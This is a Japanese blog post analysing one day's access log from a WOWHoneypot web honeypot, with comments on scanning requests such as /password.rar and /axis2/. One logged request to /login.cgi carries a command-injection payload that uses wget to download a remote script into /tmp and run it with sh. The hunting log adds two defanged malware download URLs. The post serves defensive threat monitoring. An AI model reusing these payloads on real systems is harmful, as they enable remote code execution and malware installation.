WOWHoneypotの簡易分析(30日目)
WOWhoneypotの2018/07/03(火) (運用30日目)の簡易分析です。
本日の総アクセス件数は60件です。思わず疑うレベルの少なさです。
以下が全アクセスログです。
34 2018-07-03 GET /
15 2018-07-03 GET /index.action
4 2018-07-03 HEAD /
3 2018-07-03 GET /manager/html
1 2018-07-03 GET /p.php
1 2018-07-03 GET /password.rar
1 2018-07-03 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 2018-07-03 GET /axis2/
phpMyAdmin関連と/を除外したアクセス数です。
15 2018-07-03 GET /index.action
3 2018-07-03 GET /manager/html
1 2018-07-03 GET /p.php
1 2018-07-03 GET /password.rar
1 2018-07-03 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 2018-07-03 GET /axis2/
初めて見るものが幾つかあります。
/password.rar はサーバ管理者が作って放置している、うっかりファイルがないかを探す調査行為でしょうか。
/p.php は特徴がなく不明でした。
/axis2/ はApache Axis2 というフレームワークを使っていないか、という調査行為と思われます。
本日のハンティングログは以下です。
1 2018-07-03 wget hxxp://222.186.153[.]142:26591/nodebase
1 2018-07-03 wget hxxp://185.62.190[.]191/r
以上です。